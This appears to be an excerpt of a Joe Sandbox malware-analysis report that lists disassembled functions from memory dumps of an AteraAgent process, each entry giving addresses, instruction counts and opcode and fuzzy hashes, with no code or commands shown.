                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: tK_^
                                                                                                                                                                                                                                          • API String ID: 0-136755102
                                                                                                                                                                                                                                          • Opcode ID: ff2dda736eef84b734bc454394cf2b92ed361f10e0f1333515e43c28d9ef99c9
                                                                                                                                                                                                                                          • Instruction ID: 4918fd775af2421bbd00a417f4d1ec61246087c0c223f0495b1c75d3e7ed376a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff2dda736eef84b734bc454394cf2b92ed361f10e0f1333515e43c28d9ef99c9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53317B67E0E16A4BEB21BBACACA54F53FA0EF1132870903B7D458CF1B7DF1425868240
                                                                                                                                                                                                                                          Function 00007FFD9B42E35D Relevance: .8, Instructions: 830COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 7a893f027e0b25158e0dac2722762e691bed900b69eba4705e8865287154ded3
                                                                                                                                                                                                                                          • Instruction ID: 76b9861fa8df2682aecd2b9f1f289f618c1487f09b535f9e8d618ddd3591dd03
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a893f027e0b25158e0dac2722762e691bed900b69eba4705e8865287154ded3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40123831B1DA4D4FEBA5EBAC84A4AB437E1EF65304B0901FAD48DCB2A7DD24AD45D340
                                                                                                                                                                                                                                          Function 00007FFD9B627BC9 Relevance: .8, Instructions: 756COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2542562358.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: f27af7888bcb165fb8ddab6d927791bc2aa86ec3d3853fd79999db1730972280
                                                                                                                                                                                                                                          • Instruction ID: 6e14c51127a7ec022ce5c9e1c953136814021e9a1f581b83266bc3f1769d3df1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f27af7888bcb165fb8ddab6d927791bc2aa86ec3d3853fd79999db1730972280
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4042B330709E4A4FE7A5DB28C464BA5B7E2FF55300F0546A9D09ECB2A6DB24FD85C780
                                                                                                                                                                                                                                          Function 00007FFD9B41CFC8 Relevance: .6, Instructions: 644COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 5ad5ff31ad3538feee683d4b0df14a35549197c6fccd8548eb57a6bd2acfaa6a
                                                                                                                                                                                                                                          • Instruction ID: 5fd1754c22f2e19f58d153ac7933124c9e28c11a6b77a880c33e2d14b7aa431b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ad5ff31ad3538feee683d4b0df14a35549197c6fccd8548eb57a6bd2acfaa6a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3712E330B1D64D4FD768CA9C846563AB3E1FF95708F15417DE8CAC32A6DE28EC42A742
                                                                                                                                                                                                                                          Function 00007FFD9B41DE20 Relevance: .5, Instructions: 537COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: ee8e314f2ca7a297b423c1d5272144af36e6f0053ef7337653eca0b5949bbdd6
                                                                                                                                                                                                                                          • Instruction ID: cb7df59488cd76f5107b3cbb836111d968c4403447c1ef7ab61119e4edb3c098
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ee8e314f2ca7a297b423c1d5272144af36e6f0053ef7337653eca0b5949bbdd6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CEE12871F1DA494FE758EB2C886557977E1EFA9314F0502BEE04DC32A7DE24AC028741
                                                                                                                                                                                                                                          Function 00007FFD9B42C9B5 Relevance: .5, Instructions: 522COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3bb78212ef0562fa94333e47b934b6b92f842fc66e3244d381fd9030fb6d3c8a
                                                                                                                                                                                                                                          • Instruction ID: 6b68883ec44333059769ef9b2e83d296bdbd0588a2c3b725d6a0d464691c8be5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3bb78212ef0562fa94333e47b934b6b92f842fc66e3244d381fd9030fb6d3c8a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6EF1D030B19A4D8FEFA8DB6CC465BA977E2EF98308F050179E44DD72A1CE24AD41D781
                                                                                                                                                                                                                                          Function 00007FFD9B4271ED Relevance: .5, Instructions: 477COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 670d7f4cadb5e435e93fca546e27c2e01899211bcd24d2f2e64f48c86ff68898
                                                                                                                                                                                                                                          • Instruction ID: 5412e1fc7daa94154f71fd826d4578b7fc4d82639f87eab1a605e6fd34013f3a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 670d7f4cadb5e435e93fca546e27c2e01899211bcd24d2f2e64f48c86ff68898
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3CF10370B1DA4E4FEB68EB5C846566AB7D2FFA4304F10457DE08DC72A6DE34AC029742
                                                                                                                                                                                                                                          Function 00007FFD9B41A7D3 Relevance: .4, Instructions: 442COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 883f887d9af32562ce5a21af1a0c38bcce2b38f39f018657c56145505c19e65d
                                                                                                                                                                                                                                          • Instruction ID: ff44d8d64fc8cd0bf3e982a12c73d27f8ab1a6837b5911d49627859c0d88f183
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 883f887d9af32562ce5a21af1a0c38bcce2b38f39f018657c56145505c19e65d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 07C12662F1FA8E0FF72267ECA8615E87F61FF6167870913F7C0A8860E7DC0865465291
                                                                                                                                                                                                                                          Function 00007FFD9B41D9E9 Relevance: .4, Instructions: 438COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: ab8643b1741a7192d622c709a0acfdbaf06637ed8822d200353d1a20c602420b
                                                                                                                                                                                                                                          • Instruction ID: 2dec8c2caab041b7ab58181281f9810009568632116347cffb0992bc135956a7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab8643b1741a7192d622c709a0acfdbaf06637ed8822d200353d1a20c602420b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FAD15471B0DB4D4FDB68DB58D851AA5B7E1EFA5314F04027ED08DC32A2DE26E846C782
                                                                                                                                                                                                                                          Function 00007FFD9B42C9A0 Relevance: .4, Instructions: 434COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: dc33c09df0563b1e8a50f10186cfbee82313badc81dc6a6e16f0b2e285accbae
                                                                                                                                                                                                                                          • Instruction ID: 22683093ef8d1879cc8e6c7d6f79a82c774e5f6c9a55ac959631440f270ce610
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc33c09df0563b1e8a50f10186cfbee82313badc81dc6a6e16f0b2e285accbae
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12D1D130B1DA4D8FEBA8DB1C846577D77D1EF99304F19057DE08EC32A2DE26A8819742
                                                                                                                                                                                                                                          Function 00007FFD9B430291 Relevance: .4, Instructions: 424COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 961183a39e9160817339551d5b31bd9ada9e5b0f0e74f632d4abfa1a0800ddb4
                                                                                                                                                                                                                                          • Instruction ID: 624b0a71d93b84235cdb8af6ed63eb0ba8aabad20c45f98e693ae78b55d00bde
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 961183a39e9160817339551d5b31bd9ada9e5b0f0e74f632d4abfa1a0800ddb4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 92D10671B1D98E4FEBA4DB5884A17AC77D1EF99714F0901B9E05DC32E7DD24AD428380
                                                                                                                                                                                                                                          Function 00007FFD9B42FDEF Relevance: .4, Instructions: 420COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 252b3e905d61e595652d04ac8d512797c498346b39f68db8d3d634cf2427516f
                                                                                                                                                                                                                                          • Instruction ID: 1d4fbe73ad756eceae3fca95507b6903a6bacba6c7495a4bed734f49aa1dbb07
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 252b3e905d61e595652d04ac8d512797c498346b39f68db8d3d634cf2427516f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 61C14972F0E94E4FEBA4DA5C94A57B837D2EF98748B090179E44DC72E7DE25AC029340
                                                                                                                                                                                                                                          Function 00007FFD9B42C950 Relevance: .4, Instructions: 406COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: ab355d023dc92f54d160d22cbd5ad7cdcf3c8ecb4fb9d14c9e8c4fd25de85a2a
                                                                                                                                                                                                                                          • Instruction ID: 248a7462264fdfe4449b27ba0cf861a983c1b791aa68f76270a433cc6b853143
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ab355d023dc92f54d160d22cbd5ad7cdcf3c8ecb4fb9d14c9e8c4fd25de85a2a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2C11830B0DA4C4FDB64EF5898659A977E1EF99304B0502BEE44AC72A3DE24ED4187C1
                                                                                                                                                                                                                                          Function 00007FFD9B41AAE8 Relevance: .4, Instructions: 404COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 5923e7ab4cecb4d2dea6a8ef2f9f11381d5e78b8b0a782d43f1bdfeaad539508
                                                                                                                                                                                                                                          • Instruction ID: b70d2c86d6035a8127748c730ce43a29218033eb4df45d6965ca5b06f83519b4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5923e7ab4cecb4d2dea6a8ef2f9f11381d5e78b8b0a782d43f1bdfeaad539508
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CBB1F521F1EA4E0FEBA9EB6C84A877477D1EF69304B0651BAD44DC72E3DE18AC059341
                                                                                                                                                                                                                                          Function 00007FFD9B42C579 Relevance: .4, Instructions: 388COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 043d6b8e6f1f69ba1e89d002ca3516cf1e0209a78c7ad63a2aeaede31360690e
                                                                                                                                                                                                                                          • Instruction ID: b9e082f568b71c5fff60e5256e1e15eeac732e0a51a9f5fe9a496cc1fb3249a4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 043d6b8e6f1f69ba1e89d002ca3516cf1e0209a78c7ad63a2aeaede31360690e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0B15D22B0D64A0FE775A76C98655E53FE0EF8532470A01FBD089C71F3ED18AD469391
                                                                                                                                                                                                                                          Function 00007FFD9B41B900 Relevance: .4, Instructions: 353COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 2fbd74c6f576d4edd9c6badf59d43ee19a26876ca16ac70519e1fd42b131a8a9
                                                                                                                                                                                                                                          • Instruction ID: df12d08fd4100376169b2d7cbd772bba7e6b7e76e5f6f1ce364523cb08045b6e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2fbd74c6f576d4edd9c6badf59d43ee19a26876ca16ac70519e1fd42b131a8a9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ECB16A21B0DA4D0FEBA4EB6C98616B577E1FF45324B0942FAC08DC71E7DE19A846C341
                                                                                                                                                                                                                                          Function 00007FFD9B42C990 Relevance: .3, Instructions: 348COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: eea1c61938407d3c00a1fa076b10c64325985bb25d74dba40073cb73a017f4b4
                                                                                                                                                                                                                                          • Instruction ID: 175c84ce2936085e9f381428949ea8ef73ec0c57588e254257f4d54aeb5520e9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eea1c61938407d3c00a1fa076b10c64325985bb25d74dba40073cb73a017f4b4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 67A1C571B1DB0C4FEB68DA5C98566BC77E1FF99314F05017EE44AC32A2DA26B8418782
                                                                                                                                                                                                                                          Function 00007FFD9B4186DA Relevance: .3, Instructions: 337COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 47bdccfb951ad5dda558820a42cb098705c847da6a04b322417bfbde422147f7
                                                                                                                                                                                                                                          • Instruction ID: 14da1ded371b3d0565890efadc974c170c7942ed9462e650968723ab7cb36438
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 47bdccfb951ad5dda558820a42cb098705c847da6a04b322417bfbde422147f7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6DB11631E0A65E4FEBA4DBA8D8647F877F1EF56314F0502BAD04DD72A2CA381946CB41
                                                                                                                                                                                                                                          Function 00007FFD9B413464 Relevance: .3, Instructions: 329COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 5af235341b2c65e0ea92672c00a831e823b1d7cb253f00f1a1e942a320f317d5
                                                                                                                                                                                                                                          • Instruction ID: 9610b2f312bedb47dbfaa0e9cd4371b2ed8a2d2f9a2be05f2f3b908a94223de2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5af235341b2c65e0ea92672c00a831e823b1d7cb253f00f1a1e942a320f317d5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69C1AB70E2891D4FE794EB5CD869BA8B7B2FF65314F5001B9D42CEB2A6CE252C41CB40
                                                                                                                                                                                                                                          Function 00007FFD9B41634D Relevance: .3, Instructions: 328COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 18e88938e9511c2b361d9580f60c2f7d357cf190a197249f42c19b247dbc6b18
                                                                                                                                                                                                                                          • Instruction ID: 36e40b99e7796a76f8823c691213e316e4b2aaa011f62b6ba2aea08944c27e49
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 18e88938e9511c2b361d9580f60c2f7d357cf190a197249f42c19b247dbc6b18
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 79B16C70E0961E8FEBA8DF58C4647B877B1FF65308F5551B9C00DE7292CA39A981DB40
                                                                                                                                                                                                                                          Function 00007FFD9B423BF8 Relevance: .3, Instructions: 324COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 31d0e393dcd561c146742acf1e133ee7e1848e5f3618728d5d8e05bc34ba1315
                                                                                                                                                                                                                                          • Instruction ID: a31df51fb353bec724929cf2913d9af34b56c275b731bf806fd4472ac754d404
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 31d0e393dcd561c146742acf1e133ee7e1848e5f3618728d5d8e05bc34ba1315
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E91053071DA098FEB68DB6CC494A7173E1FF55318B1505BDD08EC72A6D925F842DB81
                                                                                                                                                                                                                                          Function 00007FFD9B41CCC0 Relevance: .3, Instructions: 324COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: c8b8354ced0a9c764486797e429f000c302f9ead1a31e4774e181e39d9b0df29
                                                                                                                                                                                                                                          • Instruction ID: 2c3dc76d912f77bc4ca4a6fd53b8bcacf128e4542e209d14ab697b1dcfb0afdc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8b8354ced0a9c764486797e429f000c302f9ead1a31e4774e181e39d9b0df29
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DBB193B1F18A4D4BEB98EB989865BECB7E1FFA8304F4402B9D05DD32D6DE2468418741
                                                                                                                                                                                                                                          Function 00007FFD9B41DE79 Relevance: .3, Instructions: 323COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: afbc28639bbeef586cae28a01ae99fb88a755be8bd0a76ee0eae17b79419dae4
                                                                                                                                                                                                                                          • Instruction ID: 7a05e40a06fdcb549c6b1783665b8a2f832f58ab7b802eee752369cfe8eed896
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: afbc28639bbeef586cae28a01ae99fb88a755be8bd0a76ee0eae17b79419dae4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80914771F1DA490FE758DB2C986597577E1EFA9704B0502BEE08DC32A7DE24EC428781
                                                                                                                                                                                                                                          Function 00007FFD9B42F245 Relevance: .3, Instructions: 321COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.2535678161.00007FFD9B410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B410000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffd9b410000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
